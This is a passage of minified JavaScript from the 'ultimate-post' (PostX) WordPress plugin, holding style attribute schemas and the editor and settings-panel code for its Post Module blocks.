}"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,    \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,    \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"15"},style:[{selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { padding-bottom: {{septSpace}}px; }   \n          {{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { margin-bottom: {{septSpace}}px; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl   \n          {{ULTP}} .ultp-block-readmore a { display: flex; flex-direction: row-reverse; justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},columnFlip:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Module #1"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,   \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; }   \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,   \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active,   \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,   \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["pagiBlockCompatibility","advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["pagiMargin"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSeparatorColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:15,bottom:0,left:0,right:0,unit:"px"}}},{key:"catPadding",default:{lg:{top:0,right:0,bottom:0,left:0,unit:"px"}}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},37549:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(30077),n=l(21910),r=l(76463);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-module-1/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-module-1.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postmodule1.svg"}},edit:i.Z,save:()=>null})},64988:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(29982);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,attributes:N,className:j,context:Z,isSelected:O,clientId:R,attributes:{blockId:D,readMoreIcon:z,excerptLimit:F,showFullExcerpt:W,showSmallMeta:V,smallExcerptLimit:G,metaStyle:q,metaShow:$,catShow:K,metaSeparator:J,titleShow:Y,catStyle:X,catPosition:Q,titlePosition:ee,excerptShow:te,metaList:le,metaListSmall:oe,showSmallCat:ae,readMore:ie,readMoreText:ne,showSmallBtn:re,showSmallExcerpt:se,varticalAlign:pe,columnFlip:ce,metaPosition:ue,layout:de,customCatColor:me,onlyCatColor:ge,contentTag:ye,titleTag:be,showSeoMeta:ve,titleLength:he,metaMinText:fe,metaAuthorPrefix:ke,titleStyle:we,metaDateFormat:xe,authorLink:Te,vidIconEnable:_e,notFoundMessage:Ce,dcEnabled:Ee,dcFields:Se,previewImg:Pe,advanceId:Le,headingShow:Ie,filterShow:Be,paginationShow:Ue,paginationType:Me,navPosition:Ae,V4_1_0_CompCheck:{runComp:He},currentPostId:Ne}}=e;function je(e){B({...l,selectedDC:e})}function Ze(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Oe(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Re(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function De(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),De()}),[]),T((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,Ne,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),T((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(De(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(Oe,Re)):t.current=N}),[N]);const ze={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:Oe,section:l.section,clientId:R,context:Z,setSelectedDc:je,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){je(e),Re("dc_group")}};let Fe;if(D&&(Fe=(0,m.Kh)(N,"ultimate-post/post-module-2",D,(0,a.k0)())),Pe)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Pe});const We=x({...Le&&{id:Le},className:`ultp-block-${D} ${j}`,onClick:e=>{e.stopPropagation(),Oe("general"),Re("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:ze,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:ze})),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-module-2",key:"layout",options:[{img:"assets/img/layouts/pm2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm2/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[He?"exclude":"dep"]:a.N2}],store:ze}),(0,o.createElement)("div",We,Fe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Fe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ie||Be||Ue)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{Oe("heading"),Re("heading")},setSection:Oe,setToolbarSettings:Re}),function(){const e=`${ye}`,t=[],a=[],r=(e,t)=>(0,b.o6)()&&Ee&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Se,settingsOnClick:(e,t)=>{e?.stopPropagation(),Re(t)},selectedDC:l.selectedDC,setSelectedDc:je,setAttributes:A,dcFields:Se});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-post-module2 ultp-block-content-${pe} ultp-block-content-${ce} ultp-${de}`},l.postsList.map(((l,c)=>{const m=0==c?JSON.parse(le.replaceAll("u0022",'"')):JSON.parse(oe.replaceAll("u0022",'"'));(0==c?t:a).push((0,o.createElement)(e,{key:c,className:`ultp-block-item post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)(s.kS,{attributes:N,post:l,idx:c,VideoContent:_e&&l.has_video?(0,o.createElement)(s.nk,{onClick:e=>{e.preventDefault(),Oe("video"),Re("video")}}):null,CatCotent:0!==c&&!ae||"aboveTitle"==Q?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:X,catPosition:Q,customCatColor:me,onlyCatColor:ge,onClick:e=>{Oe("taxonomy-/-category"),Re("cat")}})),onClick:()=>{Oe("image"),Re("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},r(7,l.ID),"aboveTitle"==Q&&(0===c||ae)&&(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:X,catPosition:Q,customCatColor:me,onlyCatColor:ge,onClick:e=>{Oe("taxonomy-/-category"),Re("cat")}}),r(6,l.ID),l.title&&Y&&1==ee&&(0,o.createElement)(d.Z,{title:l.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{Oe("title"),Re("title")}}),r(5,l.ID),(0===c||V)&&$&&"top"==ue&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:J,metaStyle:q,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{Oe("meta"),Re("meta")}}),r(4,l.ID),l.title&&Y&&0==ee&&(0,o.createElement)(d.Z,{title:l.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{Oe("title"),Re("title")}}),r(3,l.ID),0==c&&te&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:W,showSeoMeta:ve,onClick:e=>{Oe("excerpt"),Re("excerpt")}}),0!=c&&se&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:G,showFullExcerpt:W,showSeoMeta:ve,onClick:e=>{Oe("excerpt"),Re("excerpt")}}),r(2,l.ID),(0===c||re)&&ie&&(0,o.createElement)(u.Z,{readMoreText:ne,readMoreIcon:z,titleLabel:l.title,onClick:()=>{Oe("read-more"),Re("read-more")}}),r(1,l.ID),(0===c||V)&&$&&"bottom"==ue&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:J,metaStyle:q,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{Oe("meta"),Re("meta")}}),r(0,l.ID),(0,b.o6)()&&Ee&&(0,o.createElement)(v.Z,{dcFields:Se,setAttributes:A,startOnboarding:Ze})))))})),(0,o.createElement)("div",{className:"ultp-big-post-module2"},t),(0,o.createElement)("div",{className:"ultp-small-post-module2"},a)):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ce})}(),Ue&&"navigation"==Me&&"topRight"!=Ae&&(0,o.createElement)(c.Z,{onClick:()=>{Oe("pagination"),Re("pagination")}}))))}},29982:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6827",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns"],include:[{position:0,data:{type:"layout",block:"post-module-2",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pm2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm2/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:4,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}},{position:5,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:6,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:7,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:8,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],hrIdx:[4,12]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF},{position:15,data:{tab:"style",type:"color",key:"LargeMetaColor",label:__("Large Post Meta Color","ultimate-post")}},{position:16,data:{tab:"style",type:"color",key:"LgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],hrIdx:[{tab:"style",hr:[9]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",exclude:["catPosition"],include:[{position:0,data:{type:"toggle",tab:"settings",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,initialOpen:b.excerpt,depend:"excerptShow",include:[{position:0,data:{type:"toggle",key:"excerptShow",label:__("Large Item Excerpt","ultimate-post")}},{position:1,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:6,data:{type:"color",key:"excerptBigColor",label:__("Large Excerpt Color","ultimate-post")}},{position:4,data:{type:"range",key:"smallExcerptLimit",min:0,max:500,step:1,help:"Excerpt Limit from Post Content.",label:__("Small Excerpt 